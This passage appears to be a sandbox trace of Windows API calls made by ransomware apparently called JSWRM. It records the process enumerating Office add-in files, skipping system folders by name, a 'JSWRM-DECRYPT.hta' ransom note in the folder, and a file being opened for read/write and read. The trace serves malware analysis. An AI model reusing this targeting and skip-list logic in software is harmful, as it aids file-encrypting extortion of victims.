dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0125.733] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.733] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4199573c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.733] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.733] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.733] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164d461d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc1040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.733] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.733] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.733] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.733] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.733] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.733] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.733] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.733] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.733] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.733] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0125.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0125.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0125.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0125.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2412b8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2472c8 [0125.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0125.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0125.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0125.734] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4199573c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4199573c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4199573c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.734] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0125.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0125.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0125.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0125.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0125.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0125.735] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf47e9c8f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.735] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.735] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.735] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.735] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.735] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.735] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.735] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.735] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.735] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.735] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0125.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0125.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0125.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0125.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e110 [0125.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0125.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.735] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb8b74ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb8b74ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb8dd674, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.735] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.735] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.735] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.735] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.735] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.735] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0125.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0125.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0125.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0125.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244f90 [0125.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0125.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.736] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5101cbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5127e7d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.736] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0125.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0125.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0125.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0125.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244978 [0125.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244f90 | out: hHeap=0x1e0000) returned 1 [0125.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.737] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x164159c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16461eac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4eb30, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.zh-CHT.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.737] lstrcmpiW (lpString1="PowerViewRes.zh-CHT.xap", lpString2=".") returned 1 [0125.737] lstrcmpiW (lpString1="PowerViewRes.zh-CHT.xap", lpString2="..") returned 1 [0125.737] lstrcmpiW (lpString1="PowerViewRes.zh-CHT.xap", lpString2="...") returned 1 [0125.737] lstrcmpiW (lpString1="PowerViewRes.zh-CHT.xap", lpString2="windows") returned -1 [0125.737] lstrcmpiW (lpString1="PowerViewRes.zh-CHT.xap", lpString2="recovery") returned -1 [0125.737] lstrcmpiW (lpString1="PowerViewRes.zh-CHT.xap", lpString2="perflogs") returned 1 [0125.737] lstrcmpiW (lpString1="PowerViewRes.zh-CHT.xap", lpString2="documents and settings") returned 1 [0125.737] lstrcmpiW (lpString1="PowerViewRes.zh-CHT.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.737] lstrcmpiW (lpString1="PowerViewRes.zh-CHT.xap", lpString2="system volume information") returned -1 [0125.737] lstrcmpiW (lpString1="PowerViewRes.zh-CHT.xap", lpString2="msocache") returned 1 [0125.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.zh-CHT.xap", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0125.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0125.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.zh-CHT.xap", cchWideChar=23, lpMultiByteStr=0x2411c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.zh-CHT.xap", lpUsedDefaultChar=0x0) returned 23 [0125.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.zh-CHT.xap", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0125.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0125.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.zh-CHT.xap", cchWideChar=23, lpMultiByteStr=0x241010, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.zh-CHT.xap", lpUsedDefaultChar=0x0) returned 23 [0125.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0125.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244978 | out: hHeap=0x1e0000) returned 1 [0125.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0125.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHT\\PowerViewRes.zh-CHT.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-cht\\powerviewres.zh-cht.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.738] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=322352) returned 1 [0125.738] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.739] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.757] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 